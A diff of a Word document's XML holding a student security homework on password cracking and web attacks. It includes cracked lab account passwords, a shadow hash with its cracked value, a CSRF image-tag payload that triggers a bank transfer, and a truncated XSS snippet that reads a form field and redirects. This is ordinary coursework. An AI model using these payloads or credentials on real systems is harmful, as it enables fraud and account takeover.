--- a/3/hwk3.docx
+++ b/3/hwk3.docx
@@ -5,10 +5,17 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
+        <w:rPr>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t xml:space="preserve">Name: </w:t>
       </w:r>
     </w:p>
@@ -19,10 +26,17 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
+        <w:rPr>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>Khoa T. Nguyen</w:t>
       </w:r>
     </w:p>
@@ -33,67 +47,915 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
+        <w:rPr>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>Arjun Sethi</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
+        <w:rPr>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>1) Buffer Overflow Vulnerability</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
+        <w:rPr>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>2) Password Security</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>a) T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>he format is:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>username:passwordHash:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>lastPasswordChange:userNumber:groupNumber:otherInformation:homeDirectory:shell</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>b)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>crack01:bike:526:531::/home/crack01:/bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>crack02:bloody:527:532::/home/crack02:/bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>crack03:blue:528:533::/home/crack03:/bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>crack04:bonjour:529:534::/home/crack04:/bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>crack05:bread:530:535::/home/crack05:/bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>crack06:bueno:531:536::/home/crack06:/bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>crack07:cowboy:532:537::/home/crack07:/bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>crack08:ddd:533:538::/home/crack08:/bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>crack09:dejavu:534:539::/home/crack09:/bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>crack10:dog:535:540::/home/crack10:/bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>crack11:perro:536:541::/home/crack11:/bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>crack12:fido:537:542::/home/crack12:/bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>crack14:hello:539:544::/home/crack14:/bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>crack15:into:540:545::/home/crack15:/bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>crack16:japan:541:546::/home/crack16:/bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>crack17:kaput:542:547::/home/crack17:/bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>crack18:1337:543:548::/home/crack18:/bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>crack19:linux:544:549::/home/crack19:/bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>crack20:mind:545:550::/home/crack20:/bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>crack21:money:546:551::/home/crack21:/bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>crack22:more:547:552::/home/crack22:/bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>crack23:abcdefgh:548:553::/home/crack23:/bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>crack24:pass:549:554::/home/crack24:/bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>crack25:really:550:555::/home/crack25:/bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>crack26:smc:551:556::/home/crack26:/bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>crack27:stir:552:557::/home/crack27:/bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>crack28:tall:553:558::/home/crack28:/bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>crack29:test:554:559::/home/crack29:/bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>crack30:usa:555:560::/home/crack30:/bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t xml:space="preserve">c) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>There’s no username in this file.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>Output:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>?:soccer</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>?:joshua</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>?:wizard</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>d)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>diana:$6$kTqQeMnV$DFFmJdHgPNtSQPHzO80RMVDQ0G3CDXdWlQSxF9JpsQWkNMwpmLJIFBpBkAhKOT2uwEZrAQRZ1kLa/rNL9xdaq.:18019:0:99999:7:::</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>e)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>123456  (diana)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>f) Setting an easy to guess password (all letters, all numbers) make it easy to brute force the hash. Adding symbols in random locations make it hard to crack by increasing the time exponentially. However, there are implementations of John the Ripper in GPU. This can significantly reduce the time.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
         <w:t>3) Web Security</w:t>
       </w:r>
     </w:p>
@@ -103,19 +965,6 @@
         <w:rPr/>
       </w:pPr>
       <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:b/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
@@ -130,6 +979,39 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
+        <w:t xml:space="preserve">This is an attack that forces the user to execute unwanted action on a site that the user is currently authenticated e.g. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t>sending funds to someone else, emailing someone sensitive information, delete their own account. The difference is the attacker does not see the user’s information, but can force the user to perform the request. The server cannot know the request is fake because the user does it from their browser.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Using cookie, POST, or verifying same origin do not prevent this attack.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
       </w:r>
     </w:p>
     <w:p>
@@ -175,7 +1057,7 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
-        <w:t>There are three main types: stored, reflection and DOM-based attack</w:t>
+        <w:t>There are three main types: stored, reflection and DOM-based attack.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -238,6 +1120,38 @@
           <w:bCs/>
         </w:rPr>
         <w:t>b)Cross-site request forgery request (XSRF)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>The easiest method is tricking the user into executing malicious URL:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>&lt;img src=”</w:t>
+      </w:r>
+      <w:hyperlink r:id="rId2">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="InternetLink"/>
+          </w:rPr>
+          <w:t>https://www.banksite.com/transferTo.php?acct=myAcct&amp;amount</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr/>
+        <w:t>=”9999” alt=”Click on me!”&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -369,22 +1283,44 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:bookmarkStart w:id="0" w:name="__DdeLink__6_77357100"/>
+      <w:r>
         <w:rPr>
           <w:color w:val="000000"/>
         </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="__DdeLink__6_77357100"/>
+        <w:t xml:space="preserve">var </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="000000"/>
         </w:rPr>
-        <w:t>var motherMaidenName = document.getElementById(</w:t>
+        <w:t>email</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = document.getElementById(</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:color w:val="A52A2A"/>
         </w:rPr>
-        <w:t>"username"</w:t>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A52A2A"/>
+        </w:rPr>
+        <w:t>email</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="A52A2A"/>
+        </w:rPr>
+        <w:t>"</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -436,17 +1372,15 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:color w:val="000000"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="000000"/>
-        </w:rPr>
         <w:t>window.location=”</w:t>
       </w:r>
-      <w:hyperlink r:id="rId2">
